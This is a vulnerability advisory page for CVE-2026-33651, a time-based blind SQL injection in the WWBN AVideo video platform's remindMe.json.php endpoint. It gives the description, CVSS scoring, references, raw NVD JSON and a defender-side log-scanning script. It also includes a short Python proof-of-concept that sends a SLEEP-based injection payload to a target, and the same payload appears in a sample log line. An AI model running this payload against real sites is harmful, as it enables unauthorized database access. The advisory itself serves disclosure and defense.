Security Vulnerability Report
CVE-2026-33651 CVSS 8.1 HIGH

Published: 2026-03-23 19:16:41
Last Modified: 2026-03-25 18:02:12

Description

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `remindMe.json.php` endpoint passes `$_REQUEST['live_schedule_id']` through multiple functions without sanitization until it reaches `Scheduler_commands::getAllActiveOrToRepeat()`, which directly concatenates it into a SQL `LIKE` clause. Although intermediate functions (`new Live_schedule()`, `getUsers_idOrCompany()`) apply `intval()` internally, they do so on local copies within `ObjectYPT::getFromDb()`, leaving the original tainted variable unchanged. Any authenticated user can perform time-based blind SQL injection to extract arbitrary database contents. Commit 75d45780728294ededa1e3f842f95295d3e7d144 contains a patch.
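A defender-side check for the flaw described above, added here as an example (it is not AVideo's code and not part of the advisory): it scans web access logs for `remindMe.json.php` requests whose `live_schedule_id` is not a plain decimal integer, the only form the intermediate `intval()` calls would have produced. The combined log format, the constructed sample lines and the name `suspicious_requests` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = '''\
203.0.113.7 - - [24/Mar/2026:10:01:02 +0000] "GET /remindMe.json.php?live_schedule_id=42 HTTP/1.1" 200 87 "-" "Mozilla/5.0"
198.51.100.23 - - [24/Mar/2026:10:02:10 +0000] "GET /remindMe.json.php?live_schedule_id=1%27+AND+IF%281%3D1%2C+SLEEP%285%29%2C+0%29--+- HTTP/1.1" 200 87 "-" "python-requests/2.31"
198.51.100.23 - - [24/Mar/2026:10:02:31 +0000] "GET /remindMe.json.php?live_schedule_id=15abc HTTP/1.1" 200 87 "-" "python-requests/2.31"
203.0.113.9 - - [24/Mar/2026:10:03:00 +0000] "GET /other.php?live_schedule_id=abc HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Mar/2026:10:03:05 +0000] "GET /remindMe.json.php HTTP/1.1" 200 40 "-" "Mozilla/5.0"
'''

# client IP, request target and status from a combined-format line
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})'
)
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_requests(log_text):
    """Return (client_ip, decoded_value) for every remindMe.json.php request
    whose live_schedule_id query value is not a plain decimal integer."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, target, _status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/remindMe.json.php"):
            continue  # only the endpoint named in the advisory
        # parse_qs percent-decodes values and turns '+' into a space
        for value in parse_qs(parts.query).get("live_schedule_id", []):
            if not INTEGER_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client}\t{value!r}")
```

Because the endpoint reads `$_REQUEST`, the parameter can also arrive in a POST body, which standard access logs do not record; a hit list from query strings alone is a lower bound.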

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo <= 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import time


def check_sqli(url, cookies):
    # The vulnerable parameter is live_schedule_id
    # Payload for time-based blind SQL injection
    payload = {
        'live_schedule_id': "1' AND IF(1=1, SLEEP(5), 0)-- -"
    }
    target_url = f"{url}/remindMe.json.php"
    try:
        start_time = time.time()
        response = requests.get(target_url, params=payload, cookies=cookies, timeout=10)
        end_time = time.time()
        # Check if the response time indicates the sleep was executed
        if end_time - start_time >= 5:
            print("[+] Vulnerable to SQL Injection!")
        else:
            print("[-] Not vulnerable or payload failed.")
    except Exception as e:
        print(f"Error: {e}")


# Usage example
# url = "http://target-site"
# cookies = {'PHPSESSID': 'authenticated_session_id'}
# check_sqli(url, cookies)
```

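References

https://github.com/WWBN/AVideo/commit/75d45780728294ededa1e3f842f95295d3e7d144 (Patch)
https://github.com/WWBN/AVideo/security/advisories/GHSA-pvw4-p2jm-chjm (Exploit, Vendor Advisory)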

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33651", "sourceIdentifier": "[email protected]", "published": "2026-03-23T19:16:41.383", "lastModified": "2026-03-25T18:02:12.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `remindMe.json.php` endpoint passes `$_REQUEST['live_schedule_id']` through multiple functions without sanitization until it reaches `Scheduler_commands::getAllActiveOrToRepeat()`, which directly concatenates it into a SQL `LIKE` clause. Although intermediate functions (`new Live_schedule()`, `getUsers_idOrCompany()`) apply `intval()` internally, they do so on local copies within `ObjectYPT::getFromDb()`, leaving the original tainted variable unchanged. Any authenticated user can perform time-based blind SQL injection to extract arbitrary database contents. Commit 75d45780728294ededa1e3f842f95295d3e7d144 contains a patch."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, el endpoint 'remindMe.json.php' pasa '$_REQUEST['live_schedule_id']' a través de múltiples funciones sin sanitización hasta que llega a 'Scheduler_commands::getAllActiveOrToRepeat()', que lo concatena directamente en una cláusula SQL 'LIKE'. Aunque las funciones intermedias ('new Live_schedule()', 'getUsers_idOrCompany()') aplican 'intval()' internamente, lo hacen en copias locales dentro de 'ObjectYPT::getFromDb()', dejando la variable original contaminada sin cambios. Cualquier usuario autenticado puede realizar una inyección SQL ciega basada en tiempo para extraer contenido arbitrario de la base de datos. 
El commit 75d45780728294ededa1e3f842f95295d3e7d144 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/75d45780728294ededa1e3f842f95295d3e7d144", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-pvw4-p2jm-chjm", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}